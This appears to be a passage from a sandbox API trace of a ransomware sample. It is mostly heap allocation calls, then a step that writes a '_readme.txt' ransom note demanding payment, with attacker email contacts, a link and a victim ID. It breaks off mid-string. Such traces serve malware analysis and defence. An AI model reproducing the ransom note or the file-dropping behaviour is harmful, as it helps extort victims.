hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.717] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.717] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.717] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.717] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.717] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.717] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.717] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.717] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.717] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.717] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.717] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.717] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.717] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.717] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.717] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.717] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.717] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.718] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.718] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.718] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.718] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.718] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.718] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.718] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.718] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.718] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.718] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.718] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.718] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.718] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.718] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.718] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.718] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.718] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.718] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.718] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.718] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.718] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.718] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.718] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.719] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.719] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.719] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.719] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.719] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.719] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.719] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.719] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.719] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.719] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.719] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.719] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.719] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.719] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.719] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.719] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.719] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.719] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.719] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.719] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.719] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.719] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.719] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.719] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.720] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.720] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.720] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.720] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.720] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc2e) returned 0x3a83058 [0209.720] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.720] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.720] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.720] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.720] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.720] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.720] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.720] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.720] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.720] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.720] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.720] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.720] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.720] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.720] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.720] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.720] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.720] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.720] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.720] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.720] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.721] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.721] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.721] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.721] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.721] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.721] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.721] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.721] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.721] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.721] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.721] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.721] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.721] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.721] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.721] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.721] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.721] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.721] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.721] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.721] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.721] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.721] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.721] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.721] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.721] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.722] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.722] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.722] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.722] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.722] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.722] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.722] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.722] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.722] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.722] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.722] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.722] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.722] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.722] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.722] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.722] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.722] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.722] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.722] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.722] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.722] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.722] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.722] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.722] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.722] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.723] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.723] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.723] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.723] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.723] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.723] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.723] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.723] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.723] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.723] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.723] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.723] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.723] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.723] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.723] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.723] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.723] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.723] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.723] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.723] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.723] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.723] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.723] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.723] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.723] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.724] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.724] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.724] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.724] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.724] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.724] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.724] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.724] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.724] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.724] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.724] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.724] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.724] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.724] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.724] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.724] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.724] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.724] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.724] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.724] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.724] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.724] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.724] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.724] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.724] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.725] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.725] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.725] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.725] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.725] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.725] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.725] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.725] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.725] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.725] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.725] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.725] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.725] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.725] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.725] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.725] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.725] PathFindFileNameW (pszPath="C:\\Boot\\it-IT\\") returned="it-IT\\" [0209.725] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.725] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0209.725] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.725] PathFindFileNameW (pszPath="") returned="" [0209.725] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.726] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x761b0000 [0209.726] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetFolderPathW") returned 0x76235708 [0209.726] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x800) returned 0x3a83058 [0209.726] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3a83058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0209.726] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x810) returned 0x32d9428 [0209.726] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.727] FreeLibrary (hLibModule=0x761b0000) returned 1 [0209.727] PathAppendW (in: pszPath="C:\\Boot\\it-IT\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\it-IT\\_readme.txt") returned 1 [0209.727] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.727] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.727] PathFileExistsW (pszPath="C:\\Boot\\it-IT\\_readme.txt") returned 0 [0209.728] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x7d00) returned 0x3a87060 [0209.728] lstrcpyW (in: lpString1=0x3a87060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" [0209.728] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our 